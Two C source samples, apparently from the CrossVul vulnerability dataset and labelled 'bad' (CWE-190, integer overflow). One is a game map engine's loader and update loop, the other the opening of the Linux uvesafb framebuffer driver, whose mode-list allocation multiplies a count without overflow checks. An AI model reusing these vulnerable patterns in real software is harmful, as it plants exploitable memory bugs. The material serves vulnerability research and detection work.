map->num_persons = 0;
for (i = 0; i < rmp.num_entities; ++i) {
if (file_read(file, &entity_hdr, 1, sizeof(struct rmp_entity_header)) != 1)
goto on_error;
if (entity_hdr.z < 0 || entity_hdr.z >= rmp.num_layers)
entity_hdr.z = 0;
switch (entity_hdr.type) {
case 1: // person
++map->num_persons;
person = &map->persons[map->num_persons - 1];
memset(person, 0, sizeof(struct map_person));
if (!(person->name = read_lstring(file, true)))
goto on_error;
if (!(person->spriteset = read_lstring(file, true)))
goto on_error;
person->x = entity_hdr.x; person->y = entity_hdr.y; person->z = entity_hdr.z;
if (file_read(file, &count, 1, 2) != 1 || count < 5)
goto on_error;
person->create_script = read_lstring(file, false);
person->destroy_script = read_lstring(file, false);
person->touch_script = read_lstring(file, false);
person->talk_script = read_lstring(file, false);
person->command_script = read_lstring(file, false);
for (j = 5; j < count; ++j)
lstr_free(read_lstring(file, true));
file_seek(file, 16, WHENCE_CUR);
break;
case 2: // trigger
if ((script = read_lstring(file, false)) == NULL) goto on_error;
memset(&trigger, 0, sizeof(struct map_trigger));
trigger.x = entity_hdr.x;
trigger.y = entity_hdr.y;
trigger.z = entity_hdr.z;
trigger.script = script_new(script, "%s/trig%d", filename, vector_len(map->triggers));
if (!vector_push(map->triggers, &trigger))
return false;
lstr_free(script);
break;
default:
goto on_error;
}
}
// load zones
for (i = 0; i < rmp.num_zones; ++i) {
if (file_read(file, &zone_hdr, 1, sizeof(struct rmp_zone_header)) != 1)
goto on_error;
if ((script = read_lstring(file, false)) == NULL) goto on_error;
if (zone_hdr.layer < 0 || zone_hdr.layer >= rmp.num_layers)
zone_hdr.layer = 0;
zone.layer = zone_hdr.layer;
zone.bounds = mk_rect(zone_hdr.x1, zone_hdr.y1, zone_hdr.x2, zone_hdr.y2);
zone.interval = zone_hdr.interval;
zone.steps_left = 0;
zone.script = script_new(script, "%s/zone%d", filename, vector_len(map->zones));
rect_normalize(&zone.bounds);
if (!vector_push(map->zones, &zone))
return false;
lstr_free(script);
}
// load tileset
if (strcmp(lstr_cstr(strings[0]), "") != 0) {
tileset_path = path_strip(path_new(filename));
path_append(tileset_path, lstr_cstr(strings[0]));
tileset = tileset_new(path_cstr(tileset_path));
path_free(tileset_path);
}
else {
tileset = tileset_read(file);
}
if (tileset == NULL) goto on_error;
// initialize tile animation
for (z = 0; z < rmp.num_layers; ++z) {
layer = &map->layers[z];
for (x = 0; x < layer->width; ++x) for (y = 0; y < layer->height; ++y) {
i = x + y * layer->width;
map->layers[z].tilemap[i].frames_left =
tileset_get_delay(tileset, map->layers[z].tilemap[i].tile_index);
}
}
// wrap things up
map->bgm_file = strcmp(lstr_cstr(strings[1]), "") != 0
? lstr_dup(strings[1]) : NULL;
map->num_layers = rmp.num_layers;
map->is_repeating = rmp.repeat_map;
map->origin.x = rmp.start_x;
map->origin.y = rmp.start_y;
map->origin.z = rmp.start_layer;
map->tileset = tileset;
if (rmp.num_strings >= 5) {
map->scripts[MAP_SCRIPT_ON_ENTER] = script_new(strings[3], "%s/onEnter", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE] = script_new(strings[4], "%s/onLeave", filename);
}
if (rmp.num_strings >= 9) {
map->scripts[MAP_SCRIPT_ON_LEAVE_NORTH] = script_new(strings[5], "%s/onLeave", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_EAST] = script_new(strings[6], "%s/onLeaveEast", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_SOUTH] = script_new(strings[7], "%s/onLeaveSouth", filename);
map->scripts[MAP_SCRIPT_ON_LEAVE_WEST] = script_new(strings[8], "%s/onLeaveWest", filename);
}
for (i = 0; i < rmp.num_strings; ++i)
lstr_free(strings[i]);
free(strings);
break;
default:
goto on_error;
}
file_close(file);
return map;
on_error:
if (file != NULL) file_close(file);
free(tile_data);
if (strings != NULL) {
for (i = 0; i < rmp.num_strings; ++i) lstr_free(strings[i]);
free(strings);
}
if (map != NULL) {
if (map->layers != NULL) {
for (i = 0; i < rmp.num_layers; ++i) {
lstr_free(map->layers[i].name);
free(map->layers[i].tilemap);
obsmap_free(map->layers[i].obsmap);
}
free(map->layers);
}
if (map->persons != NULL) {
for (i = 0; i < map->num_persons; ++i) {
lstr_free(map->persons[i].name);
lstr_free(map->persons[i].spriteset);
lstr_free(map->persons[i].create_script);
lstr_free(map->persons[i].destroy_script);
lstr_free(map->persons[i].command_script);
lstr_free(map->persons[i].talk_script);
lstr_free(map->persons[i].touch_script);
}
free(map->persons);
}
vector_free(map->triggers);
vector_free(map->zones);
free(map);
}
return NULL;
}
void
map_screen_to_layer(int layer, int camera_x, int camera_y, int* inout_x, int* inout_y)
{
rect_t bounds;
int center_x;
int center_y;
int layer_h;
int layer_w;
float plx_offset_x = 0.0;
int plx_offset_y = 0.0;
size2_t resolution;
int tile_w;
int tile_h;
int x_offset;
int y_offset;
// get layer and screen metrics
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
layer_w = s_map->layers[layer].width * tile_w;
layer_h = s_map->layers[layer].height * tile_h;
center_x = resolution.width / 2;
center_y = resolution.height / 2;
// initial camera correction
if (!s_map->is_repeating) {
bounds = map_bounds();
camera_x = fmin(fmax(camera_x, bounds.x1 + center_x), bounds.x2 - center_x);
camera_y = fmin(fmax(camera_y, bounds.y1 + center_y), bounds.y2 - center_y);
}
// remap screen coordinates to layer coordinates
plx_offset_x = s_frames * s_map->layers[layer].autoscroll_x
- camera_x * (s_map->layers[layer].parallax_x - 1.0);
plx_offset_y = s_frames * s_map->layers[layer].autoscroll_y
- camera_y * (s_map->layers[layer].parallax_y - 1.0);
x_offset = camera_x - center_x - plx_offset_x;
y_offset = camera_y - center_y - plx_offset_y;
if (!s_map->is_repeating && !s_map->layers[layer].is_parallax) {
// if the map is smaller than the screen, align to top left. centering
// would be better aesthetically, but there are a couple Sphere 1.x games
// that depend on top-left justification.
if (layer_w < resolution.width)
x_offset = 0;
if (layer_h < resolution.height)
y_offset = 0;
}
if (inout_x != NULL)
*inout_x += x_offset;
if (inout_y != NULL)
*inout_y += y_offset;
// normalize coordinates. this simplifies rendering calculations.
if (s_map->is_repeating || s_map->layers[layer].is_parallax) {
if (inout_x) *inout_x = (*inout_x % layer_w + layer_w) % layer_w;
if (inout_y) *inout_y = (*inout_y % layer_h + layer_h) % layer_h;
}
}
static void
map_screen_to_map(int camera_x, int camera_y, int* inout_x, int* inout_y)
{
rect_t bounds;
int center_x;
int center_y;
int map_h;
int map_w;
size2_t resolution;
int tile_h;
int tile_w;
int x_offset;
int y_offset;
// get layer and screen metrics
resolution = screen_size(g_screen);
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
map_w = s_map->width * tile_w;
map_h = s_map->height * tile_h;
center_x = resolution.width / 2;
center_y = resolution.height / 2;
// initial camera correction
if (!s_map->is_repeating) {
bounds = map_bounds();
camera_x = fmin(fmax(camera_x, bounds.x1 + center_x), bounds.x2 - center_x);
camera_y = fmin(fmax(camera_y, bounds.y1 + center_y), bounds.y2 - center_y);
}
// remap screen coordinates to map coordinates
x_offset = camera_x - center_x;
y_offset = camera_y - center_y;
if (!s_map->is_repeating) {
// if the map is smaller than the screen, align to top left. centering
// would be better aesthetically, but there are a couple Sphere 1.x games
// that depend on top-left justification.
if (map_w < resolution.width)
x_offset = 0;
if (map_h < resolution.height)
y_offset = 0;
}
if (inout_x != NULL)
*inout_x += x_offset;
if (inout_y != NULL)
*inout_y += y_offset;
// normalize coordinates
if (s_map->is_repeating) {
if (inout_x) *inout_x = (*inout_x % map_w + map_w) % map_w;
if (inout_y) *inout_y = (*inout_y % map_h + map_h) % map_h;
}
}
static void
process_map_input(void)
{
int mv_x, mv_y;
person_t* person;
int i;
// clear out excess keys from key queue
kb_clear_queue();
// check for player control of input persons, if there are any
for (i = 0; i < PLAYER_MAX; ++i) {
person = s_players[i].person;
if (person != NULL) {
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_A))
|| kb_is_key_down(s_players[i].talk_key)
|| joy_is_button_down(i, s_talk_button))
{
if (s_players[i].is_talk_allowed)
person_talk(person);
s_players[i].is_talk_allowed = false;
}
else {
// allow talking again only after key is released
s_players[i].is_talk_allowed = true;
}
mv_x = 0; mv_y = 0;
if (person->num_commands == 0 && person->leader == NULL) {
// allow player control only if the input person is idle and not being led around
// by someone else.
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_UP)) || joy_position(i, 1) <= -0.5)
mv_y = -1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_RIGHT)) || joy_position(i, 0) >= 0.5)
mv_x = 1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_DOWN)) || joy_position(i, 1) >= 0.5)
mv_y = 1;
if (kb_is_key_down(get_player_key(i, PLAYER_KEY_LEFT)) || joy_position(i, 0) <= -0.5)
mv_x = -1;
}
switch (mv_x + mv_y * 3) {
case -3: // north
person_queue_command(person, COMMAND_MOVE_NORTH, true);
person_queue_command(person, COMMAND_FACE_NORTH, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -2: // northeast
person_queue_command(person, COMMAND_MOVE_NORTHEAST, true);
person_queue_command(person, COMMAND_FACE_NORTHEAST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 1: // east
person_queue_command(person, COMMAND_MOVE_EAST, true);
person_queue_command(person, COMMAND_FACE_EAST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 4: // southeast
person_queue_command(person, COMMAND_MOVE_SOUTHEAST, true);
person_queue_command(person, COMMAND_FACE_SOUTHEAST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 3: // south
person_queue_command(person, COMMAND_MOVE_SOUTH, true);
person_queue_command(person, COMMAND_FACE_SOUTH, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case 2: // southwest
person_queue_command(person, COMMAND_MOVE_SOUTHWEST, true);
person_queue_command(person, COMMAND_FACE_SOUTHWEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -1: // west
person_queue_command(person, COMMAND_MOVE_WEST, true);
person_queue_command(person, COMMAND_FACE_WEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
case -4: // northwest
person_queue_command(person, COMMAND_MOVE_NORTHWEST, true);
person_queue_command(person, COMMAND_FACE_NORTHWEST, true);
person_queue_command(person, COMMAND_ANIMATE, false);
break;
}
}
}
update_bound_keys(true);
}
static void
record_step(person_t* person)
{
struct step* p_step;
if (person->max_history <= 0)
return;
memmove(&person->steps[1], &person->steps[0], (person->max_history - 1) * sizeof(struct step));
p_step = &person->steps[0];
p_step->x = person->x;
p_step->y = person->y;
}
void
reset_persons(bool keep_existing)
{
unsigned int id;
point3_t origin;
person_t* person;
int i, j;
origin = map_origin();
for (i = 0; i < s_num_persons; ++i) {
person = s_persons[i];
id = person->id;
if (!keep_existing)
person->num_commands = 0;
if (person->is_persistent || keep_existing) {
person->x = origin.x;
person->y = origin.y;
person->layer = origin.z;
}
else {
person_activate(person, PERSON_SCRIPT_ON_DESTROY, NULL, true);
free_person(person);
--s_num_persons;
for (j = i; j < s_num_persons; ++j)
s_persons[j] = s_persons[j + 1];
--i;
}
}
sort_persons();
}
static void
set_person_name(person_t* person, const char* name)
{
person->name = realloc(person->name, (strlen(name) + 1) * sizeof(char));
strcpy(person->name, name);
}
static void
sort_persons(void)
{
qsort(s_persons, s_num_persons, sizeof(person_t*), compare_persons);
}
static void
update_map_engine(bool in_main_loop)
{
bool has_moved;
int index;
bool is_sort_needed = false;
int last_trigger;
int last_zone;
int layer;
int map_w, map_h;
int num_zone_steps;
script_t* script_to_run;
int script_type;
double start_x[PLAYER_MAX];
double start_y[PLAYER_MAX];
int tile_w, tile_h;
struct map_trigger* trigger;
double x, y, px, py;
struct map_zone* zone;
int i, j, k;
++s_frames;
tileset_get_size(s_map->tileset, &tile_w, &tile_h);
map_w = s_map->width * tile_w;
map_h = s_map->height * tile_h;
tileset_update(s_map->tileset);
for (i = 0; i < PLAYER_MAX; ++i) if (s_players[i].person != NULL)
person_get_xy(s_players[i].person, &start_x[i], &start_y[i], false);
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader != NULL)
continue; // skip followers for now
update_person(s_persons[i], &has_moved);
is_sort_needed |= has_moved;
}
if (is_sort_needed)
sort_persons();
// update color mask fade level
if (s_fade_progress < s_fade_frames) {
++s_fade_progress;
s_color_mask = color_mix(s_fade_color_to, s_fade_color_from,
s_fade_progress, s_fade_frames - s_fade_progress);
}
// update camera
if (s_camera_person != NULL) {
person_get_xy(s_camera_person, &x, &y, true);
s_camera_x = x; s_camera_y = y;
}
// run edge script if the camera has moved past the edge of the map
// note: only applies for non-repeating maps
if (in_main_loop && !s_map->is_repeating) {
script_type = s_camera_y < 0 ? MAP_SCRIPT_ON_LEAVE_NORTH
: s_camera_x >= map_w ? MAP_SCRIPT_ON_LEAVE_EAST
: s_camera_y >= map_h ? MAP_SCRIPT_ON_LEAVE_SOUTH
: s_camera_x < 0 ? MAP_SCRIPT_ON_LEAVE_WEST
: MAP_SCRIPT_MAX;
if (script_type < MAP_SCRIPT_MAX)
map_activate(script_type, true);
}
// if there are any input persons, check for trigger activation
for (i = 0; i < PLAYER_MAX; ++i) if (s_players[i].person != NULL) {
// did we step on a trigger or move to a new one?
person_get_xyz(s_players[i].person, &x, &y, &layer, true);
trigger = get_trigger_at(x, y, layer, &index);
if (trigger != s_on_trigger) {
last_trigger = s_current_trigger;
s_current_trigger = index;
s_on_trigger = trigger;
if (trigger != NULL)
script_run(trigger->script, false);
s_current_trigger = last_trigger;
}
}
// update any zones occupied by the input person
// note: a zone's step count is in reality a pixel count, so a zone
// may be updated multiple times in a single frame.
for (k = 0; k < PLAYER_MAX; ++k) if (s_players[k].person != NULL) {
person_get_xy(s_players[k].person, &x, &y, false);
px = fabs(x - start_x[k]);
py = fabs(y - start_y[k]);
num_zone_steps = px > py ? px : py;
for (i = 0; i < num_zone_steps; ++i) {
j = 0;
while ((zone = get_zone_at(x, y, layer, j++, &index))) {
if (zone->steps_left-- <= 0) {
last_zone = s_current_zone;
s_current_zone = index;
zone->steps_left = zone->interval;
script_run(zone->script, true);
s_current_zone = last_zone;
}
}
}
}
// check if there are any deferred scripts due to run this frame
// and run the ones that are
for (i = 0; i < s_num_deferreds; ++i) {
if (s_deferreds[i].frames_left-- <= 0) {
script_to_run = s_deferreds[i].script;
for (j = i; j < s_num_deferreds - 1; ++j)
s_deferreds[j] = s_deferreds[j + 1];
--s_num_deferreds;
script_run(script_to_run, false);
script_unref(script_to_run);
--i;
}
}
// now that everything else is in order, we can run the
// update script!
script_run(s_update_script, false);
}
static void
update_person(person_t* person, bool* out_has_moved)
{
struct command command;
double delta_x, delta_y;
int facing;
bool has_moved;
bool is_finished;
const person_t* last_person;
struct step step;
int vector;
int i;
person->mv_x = 0; person->mv_y = 0;
if (person->revert_frames > 0 && --person->revert_frames <= 0)
person->frame = 0;
if (person->leader == NULL) { // no leader; use command queue
// call the command generator if the queue is empty
if (person->num_commands == 0)
person_activate(person, PERSON_SCRIPT_GENERATOR, NULL, true);
// run through the queue, stopping after the first non-immediate command
is_finished = !does_person_exist(person) || person->num_commands == 0;
while (!is_finished) {
command = person->commands[0];
--person->num_commands;
for (i = 0; i < person->num_commands; ++i)
person->commands[i] = person->commands[i + 1];
last_person = s_current_person;
s_current_person = person;
if (command.type != COMMAND_RUN_SCRIPT)
command_person(person, command.type);
else
script_run(command.script, false);
s_current_person = last_person;
script_unref(command.script);
is_finished = !does_person_exist(person) // stop if person was destroyed
|| !command.is_immediate || person->num_commands == 0;
}
}
else { // leader set; follow the leader!
step = person->leader->steps[person->follow_distance - 1];
delta_x = step.x - person->x;
delta_y = step.y - person->y;
if (fabs(delta_x) > person->speed_x)
command_person(person, delta_x > 0 ? COMMAND_MOVE_EAST : COMMAND_MOVE_WEST);
if (!does_person_exist(person)) return;
if (fabs(delta_y) > person->speed_y)
command_person(person, delta_y > 0 ? COMMAND_MOVE_SOUTH : COMMAND_MOVE_NORTH);
if (!does_person_exist(person)) return;
vector = person->mv_x + person->mv_y * 3;
facing = vector == -3 ? COMMAND_FACE_NORTH
: vector == -2 ? COMMAND_FACE_NORTHEAST
: vector == 1 ? COMMAND_FACE_EAST
: vector == 4 ? COMMAND_FACE_SOUTHEAST
: vector == 3 ? COMMAND_FACE_SOUTH
: vector == 2 ? COMMAND_FACE_SOUTHWEST
: vector == -1 ? COMMAND_FACE_WEST
: vector == -4 ? COMMAND_FACE_NORTHWEST
: COMMAND_WAIT;
if (facing != COMMAND_WAIT)
command_person(person, COMMAND_ANIMATE);
if (!does_person_exist(person)) return;
command_person(person, facing);
}
// check that the person didn't mysteriously disappear...
if (!does_person_exist(person))
return; // they probably got eaten by a pig.
// if the person's position changed, record it in their step history
*out_has_moved = person_has_moved(person);
if (*out_has_moved)
record_step(person);
// recursively update the follower chain
for (i = 0; i < s_num_persons; ++i) {
if (s_persons[i]->leader != person)
continue;
update_person(s_persons[i], &has_moved);
*out_has_moved |= has_moved;
}
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_35_0 |
crossvul-cpp_data_bad_222_0 | /*
* A framebuffer driver for VBE 2.0+ compliant video cards
*
* (c) 2007 Michal Januszewski <spock@gentoo.org>
* Loosely based upon the vesafb driver.
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/init.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/skbuff.h>
#include <linux/timer.h>
#include <linux/completion.h>
#include <linux/connector.h>
#include <linux/random.h>
#include <linux/platform_device.h>
#include <linux/limits.h>
#include <linux/fb.h>
#include <linux/io.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <video/edid.h>
#include <video/uvesafb.h>
#ifdef CONFIG_X86
#include <video/vga.h>
#endif
#include "edid.h"
static struct cb_id uvesafb_cn_id = {
.idx = CN_IDX_V86D,
.val = CN_VAL_V86D_UVESAFB
};
static char v86d_path[PATH_MAX] = "/sbin/v86d";
static char v86d_started; /* has v86d been started by uvesafb? */
static const struct fb_fix_screeninfo uvesafb_fix = {
.id = "VESA VGA",
.type = FB_TYPE_PACKED_PIXELS,
.accel = FB_ACCEL_NONE,
.visual = FB_VISUAL_TRUECOLOR,
};
static int mtrr = 3; /* enable mtrr by default */
static bool blank = 1; /* enable blanking by default */
static int ypan = 1; /* 0: scroll, 1: ypan, 2: ywrap */
static bool pmi_setpal = true; /* use PMI for palette changes */
static bool nocrtc; /* ignore CRTC settings */
static bool noedid; /* don't try DDC transfers */
static int vram_remap; /* set amt. of memory to be used */
static int vram_total; /* set total amount of memory */
static u16 maxclk; /* maximum pixel clock */
static u16 maxvf; /* maximum vertical frequency */
static u16 maxhf; /* maximum horizontal frequency */
static u16 vbemode; /* force use of a specific VBE mode */
static char *mode_option;
static u8 dac_width = 6;
static struct uvesafb_ktask *uvfb_tasks[UVESAFB_TASKS_MAX];
static DEFINE_MUTEX(uvfb_lock);
/*
* A handler for replies from userspace.
*
* Make sure each message passes consistency checks and if it does,
* find the kernel part of the task struct, copy the registers and
* the buffer contents and then complete the task.
*/
static void uvesafb_cn_callback(struct cn_msg *msg, struct netlink_skb_parms *nsp)
{
struct uvesafb_task *utask;
struct uvesafb_ktask *task;
if (!capable(CAP_SYS_ADMIN))
return;
if (msg->seq >= UVESAFB_TASKS_MAX)
return;
mutex_lock(&uvfb_lock);
task = uvfb_tasks[msg->seq];
if (!task || msg->ack != task->ack) {
mutex_unlock(&uvfb_lock);
return;
}
utask = (struct uvesafb_task *)msg->data;
/* Sanity checks for the buffer length. */
if (task->t.buf_len < utask->buf_len ||
utask->buf_len > msg->len - sizeof(*utask)) {
mutex_unlock(&uvfb_lock);
return;
}
uvfb_tasks[msg->seq] = NULL;
mutex_unlock(&uvfb_lock);
memcpy(&task->t, utask, sizeof(*utask));
if (task->t.buf_len && task->buf)
memcpy(task->buf, utask + 1, task->t.buf_len);
complete(task->done);
return;
}
static int uvesafb_helper_start(void)
{
char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin",
NULL,
};
char *argv[] = {
v86d_path,
NULL,
};
return call_usermodehelper(v86d_path, argv, envp, UMH_WAIT_PROC);
}
/*
* Execute a uvesafb task.
*
* Returns 0 if the task is executed successfully.
*
* A message sent to the userspace consists of the uvesafb_task
* struct and (optionally) a buffer. The uvesafb_task struct is
* a simplified version of uvesafb_ktask (its kernel counterpart)
* containing only the register values, flags and the length of
* the buffer.
*
* Each message is assigned a sequence number (increased linearly)
* and a random ack number. The sequence number is used as a key
* for the uvfb_tasks array which holds pointers to uvesafb_ktask
* structs for all requests.
*/
static int uvesafb_exec(struct uvesafb_ktask *task)
{
static int seq;
struct cn_msg *m;
int err;
int len = sizeof(task->t) + task->t.buf_len;
/*
* Check whether the message isn't longer than the maximum
* allowed by connector.
*/
if (sizeof(*m) + len > CONNECTOR_MAX_MSG_SIZE) {
pr_warn("message too long (%d), can't execute task\n",
(int)(sizeof(*m) + len));
return -E2BIG;
}
m = kzalloc(sizeof(*m) + len, GFP_KERNEL);
if (!m)
return -ENOMEM;
init_completion(task->done);
memcpy(&m->id, &uvesafb_cn_id, sizeof(m->id));
m->seq = seq;
m->len = len;
m->ack = prandom_u32();
/* uvesafb_task structure */
memcpy(m + 1, &task->t, sizeof(task->t));
/* Buffer */
memcpy((u8 *)(m + 1) + sizeof(task->t), task->buf, task->t.buf_len);
/*
* Save the message ack number so that we can find the kernel
* part of this task when a reply is received from userspace.
*/
task->ack = m->ack;
mutex_lock(&uvfb_lock);
/* If all slots are taken -- bail out. */
if (uvfb_tasks[seq]) {
mutex_unlock(&uvfb_lock);
err = -EBUSY;
goto out;
}
/* Save a pointer to the kernel part of the task struct. */
uvfb_tasks[seq] = task;
mutex_unlock(&uvfb_lock);
err = cn_netlink_send(m, 0, 0, GFP_KERNEL);
if (err == -ESRCH) {
/*
* Try to start the userspace helper if sending
* the request failed the first time.
*/
err = uvesafb_helper_start();
if (err) {
pr_err("failed to execute %s\n", v86d_path);
pr_err("make sure that the v86d helper is installed and executable\n");
} else {
v86d_started = 1;
err = cn_netlink_send(m, 0, 0, gfp_any());
if (err == -ENOBUFS)
err = 0;
}
} else if (err == -ENOBUFS)
err = 0;
if (!err && !(task->t.flags & TF_EXIT))
err = !wait_for_completion_timeout(task->done,
msecs_to_jiffies(UVESAFB_TIMEOUT));
mutex_lock(&uvfb_lock);
uvfb_tasks[seq] = NULL;
mutex_unlock(&uvfb_lock);
seq++;
if (seq >= UVESAFB_TASKS_MAX)
seq = 0;
out:
kfree(m);
return err;
}
/*
* Free a uvesafb_ktask struct.
*/
static void uvesafb_free(struct uvesafb_ktask *task)
{
if (task) {
kfree(task->done);
kfree(task);
}
}
/*
* Prepare a uvesafb_ktask struct to be used again.
*/
static void uvesafb_reset(struct uvesafb_ktask *task)
{
struct completion *cpl = task->done;
memset(task, 0, sizeof(*task));
task->done = cpl;
}
/*
* Allocate and prepare a uvesafb_ktask struct.
*/
static struct uvesafb_ktask *uvesafb_prep(void)
{
struct uvesafb_ktask *task;
task = kzalloc(sizeof(*task), GFP_KERNEL);
if (task) {
task->done = kzalloc(sizeof(*task->done), GFP_KERNEL);
if (!task->done) {
kfree(task);
task = NULL;
}
}
return task;
}
static void uvesafb_setup_var(struct fb_var_screeninfo *var,
struct fb_info *info, struct vbe_mode_ib *mode)
{
struct uvesafb_par *par = info->par;
var->vmode = FB_VMODE_NONINTERLACED;
var->sync = FB_SYNC_VERT_HIGH_ACT;
var->xres = mode->x_res;
var->yres = mode->y_res;
var->xres_virtual = mode->x_res;
var->yres_virtual = (par->ypan) ?
info->fix.smem_len / mode->bytes_per_scan_line :
mode->y_res;
var->xoffset = 0;
var->yoffset = 0;
var->bits_per_pixel = mode->bits_per_pixel;
if (var->bits_per_pixel == 15)
var->bits_per_pixel = 16;
if (var->bits_per_pixel > 8) {
var->red.offset = mode->red_off;
var->red.length = mode->red_len;
var->green.offset = mode->green_off;
var->green.length = mode->green_len;
var->blue.offset = mode->blue_off;
var->blue.length = mode->blue_len;
var->transp.offset = mode->rsvd_off;
var->transp.length = mode->rsvd_len;
} else {
var->red.offset = 0;
var->green.offset = 0;
var->blue.offset = 0;
var->transp.offset = 0;
var->red.length = 8;
var->green.length = 8;
var->blue.length = 8;
var->transp.length = 0;
}
}
static int uvesafb_vbe_find_mode(struct uvesafb_par *par,
int xres, int yres, int depth, unsigned char flags)
{
int i, match = -1, h = 0, d = 0x7fffffff;
for (i = 0; i < par->vbe_modes_cnt; i++) {
h = abs(par->vbe_modes[i].x_res - xres) +
abs(par->vbe_modes[i].y_res - yres) +
abs(depth - par->vbe_modes[i].depth);
/*
* We have an exact match in terms of resolution
* and depth.
*/
if (h == 0)
return i;
if (h < d || (h == d && par->vbe_modes[i].depth > depth)) {
d = h;
match = i;
}
}
i = 1;
if (flags & UVESAFB_EXACT_DEPTH &&
par->vbe_modes[match].depth != depth)
i = 0;
if (flags & UVESAFB_EXACT_RES && d > 24)
i = 0;
if (i != 0)
return match;
else
return -1;
}
static u8 *uvesafb_vbe_state_save(struct uvesafb_par *par)
{
struct uvesafb_ktask *task;
u8 *state;
int err;
if (!par->vbe_state_size)
return NULL;
state = kmalloc(par->vbe_state_size, GFP_KERNEL);
if (!state)
return ERR_PTR(-ENOMEM);
task = uvesafb_prep();
if (!task) {
kfree(state);
return NULL;
}
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0001;
task->t.flags = TF_BUF_RET | TF_BUF_ESBX;
task->t.buf_len = par->vbe_state_size;
task->buf = state;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("VBE get state call failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
kfree(state);
state = NULL;
}
uvesafb_free(task);
return state;
}
static void uvesafb_vbe_state_restore(struct uvesafb_par *par, u8 *state_buf)
{
struct uvesafb_ktask *task;
int err;
if (!state_buf)
return;
task = uvesafb_prep();
if (!task)
return;
task->t.regs.eax = 0x4f04;
task->t.regs.ecx = 0x000f;
task->t.regs.edx = 0x0002;
task->t.buf_len = par->vbe_state_size;
task->t.flags = TF_BUF_ESBX;
task->buf = state_buf;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f)
pr_warn("VBE state restore call failed (eax=0x%x, err=%d)\n",
task->t.regs.eax, err);
uvesafb_free(task);
}
static int uvesafb_vbe_getinfo(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int err;
task->t.regs.eax = 0x4f00;
task->t.flags = TF_VBEIB;
task->t.buf_len = sizeof(struct vbe_ib);
task->buf = &par->vbe_ib;
strncpy(par->vbe_ib.vbe_signature, "VBE2", 4);
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_err("Getting VBE info block failed (eax=0x%x, err=%d)\n",
(u32)task->t.regs.eax, err);
return -EINVAL;
}
if (par->vbe_ib.vbe_version < 0x0200) {
pr_err("Sorry, pre-VBE 2.0 cards are not supported\n");
return -EINVAL;
}
if (!par->vbe_ib.mode_list_ptr) {
pr_err("Missing mode list!\n");
return -EINVAL;
}
pr_info("");
/*
* Convert string pointers and the mode list pointer into
* usable addresses. Print informational messages about the
* video adapter and its vendor.
*/
if (par->vbe_ib.oem_vendor_name_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_vendor_name_ptr);
if (par->vbe_ib.oem_product_name_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_product_name_ptr);
if (par->vbe_ib.oem_product_rev_ptr)
pr_cont("%s, ",
((char *)task->buf) + par->vbe_ib.oem_product_rev_ptr);
if (par->vbe_ib.oem_string_ptr)
pr_cont("OEM: %s, ",
((char *)task->buf) + par->vbe_ib.oem_string_ptr);
pr_cont("VBE v%d.%d\n",
(par->vbe_ib.vbe_version & 0xff00) >> 8,
par->vbe_ib.vbe_version & 0xff);
return 0;
}
static int uvesafb_vbe_getmodes(struct uvesafb_ktask *task,
struct uvesafb_par *par)
{
int off = 0, err;
u16 *mode;
par->vbe_modes_cnt = 0;
/* Count available modes. */
mode = (u16 *) (((u8 *)&par->vbe_ib) + par->vbe_ib.mode_list_ptr);
while (*mode != 0xffff) {
par->vbe_modes_cnt++;
mode++;
}
par->vbe_modes = kzalloc(sizeof(struct vbe_mode_ib) *
par->vbe_modes_cnt, GFP_KERNEL);
if (!par->vbe_modes)
return -ENOMEM;
/* Get info about all available modes. */
mode = (u16 *) (((u8 *)&par->vbe_ib) + par->vbe_ib.mode_list_ptr);
while (*mode != 0xffff) {
struct vbe_mode_ib *mib;
uvesafb_reset(task);
task->t.regs.eax = 0x4f01;
task->t.regs.ecx = (u32) *mode;
task->t.flags = TF_BUF_RET | TF_BUF_ESDI;
task->t.buf_len = sizeof(struct vbe_mode_ib);
task->buf = par->vbe_modes + off;
err = uvesafb_exec(task);
if (err || (task->t.regs.eax & 0xffff) != 0x004f) {
pr_warn("Getting mode info block for mode 0x%x failed (eax=0x%x, err=%d)\n",
*mode, (u32)task->t.regs.eax, err);
mode++;
par->vbe_modes_cnt--;
continue;
}
mib = task->buf;
mib->mode_id = *mode;
/*
* We only want modes that are supported with the current
* hardware configuration, color, graphics and that have
* support for the LFB.
*/
if ((mib->mode_attr & VBE_MODE_MASK) == VBE_MODE_MASK &&
mib->bits_per_pixel >= 8)
off++;
else
par->vbe_modes_cnt--;
mode++;
mib->depth = mib->red_len + mib->green_len + mib->blue_len;
/*
* Handle 8bpp modes and modes with broken color component
* lengths.
*/
if (mib->depth == 0 || (mib->depth == 24 &&
mib->bits_per_pixel == 32))
